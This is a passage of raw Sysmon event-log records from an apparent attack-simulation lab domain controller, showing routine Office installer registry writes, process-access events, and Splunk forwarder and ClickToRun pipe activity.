Extensions\Approved\{72B66649-3DBF-429F-BD6F-7774A9784B78}Microsoft Excel Thumbnail Handler 13241300x800000000000000076814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.451{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}Microsoft Access Thumbnail Handler 13241300x800000000000000076813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155}Microsoft Word Metadata Handler 13241300x800000000000000076812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{5383EF74-273B-4278-AB0C-CDAA9FD5369E}Microsoft Visio Metadata Handler 13241300x800000000000000076811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{01BE4CFB-129A-452B-A209-F9D40B3B84A5}Microsoft PowerPoint Metadata Handler 13241300x800000000000000076810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{33154C99-BF49-443D-A73C-303A23ABBE97}Microsoft Excel Metadata Handler 13241300x800000000000000076809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{E3956DCF-D1C7-4375-AAAA-22FF8191C479}Microsoft Access Metadata Handler 13241300x800000000000000076808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{68CED213-317D-3F27-9036-A33240DA522E}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000076807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{1227B818-7298-3D68-AC55-DDDA56EE56E1}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000076806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{07B06095-5687-4D13-9E32-12B4259C9813}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000076805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{CDEC13B2-0B3C-400E-B909-E27EE89C6799}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 23542300x800000000000000076804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.436{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA4B6DBB76B6EF40F9F4430BDE7B35C,SHA256=9822E2089A6F231F256A1BC28A2E10C7CC9004736F9495061F421288397E970B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000076803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E18FEC31-2EA1-49A2-A7A6-902DC0D1FF05}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9800F18F-3D86-4744-A7D0-540989C86D7B}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3B0BD075-929C-4E52-AAD1-458C81A10B24}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9ED13477-E909-45BC-BADC-2106D04D6BD7}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{BDEADEF5-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{BDEADE9E-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000076797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3FD37ABB-F90A-4DE5-AA38-179629E64C2F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000076796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.436{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{62B4D041-4667-40B6-BB50-4BC0A5043A73}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 10341000x800000000000000076795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.420{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E50D-00000000BB01}2528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.420{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF9-607E-E50D-00000000BB01}2528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000076793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D0B22D03-D05D-4C6D-8AB7-9392E84A87B9}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D5EC4D34-77DA-4F7A-B8C4-8A910C1C1CFE}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{805B7F91-C9CF-4EDF-ACA6-775664FDFB3E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{97A2762C-403C-4953-A121-7A75ABCE4373}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{8D4F994C-EBBE-4F8D-BA4B-AE20CD36E72D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{A1EB89D6-0A9C-4575-A0AE-654A990A454C}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{367E582C-F71C-4BF9-AA1B-9F62B793E9C5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{6F3DD387-5AF2-492B-BDE2-30FF2F451241}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{CD7791B9-43FD-42C5-AE42-8DD2811F0419}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000076784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A2-0366-4F5C-9434-25CF162E475F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000076783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A2-0366-4F5C-9434-25CF162E475E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000076782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A0-0366-4F5C-9434-25CF162E475F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 13241300x800000000000000076781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:58:01.404{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3BE786A0-0366-4F5C-9434-25CF162E475E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEOLEDB.DLL 18141800x800000000000000076780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.357{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000076779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeMD5=E6F107D6EEC45D320E5401C649303837,SHA256=59DA43A09AF9FD6EAAD6E02D5C838AF62D1DD5E01A892E380C92D70B793D1B34,IMPHASH=E8BEA05A14048595A134B0431534A6DFfalsefalse - rename failed with status 0xc0000022 10341000x800000000000000076778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-E40D-00000000BB01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E40D-00000000BB01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.342{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBF9-607E-E40D-00000000BB01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.204{A7A01FEF-EBF9-607E-E40D-00000000BB01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000076770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.232{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 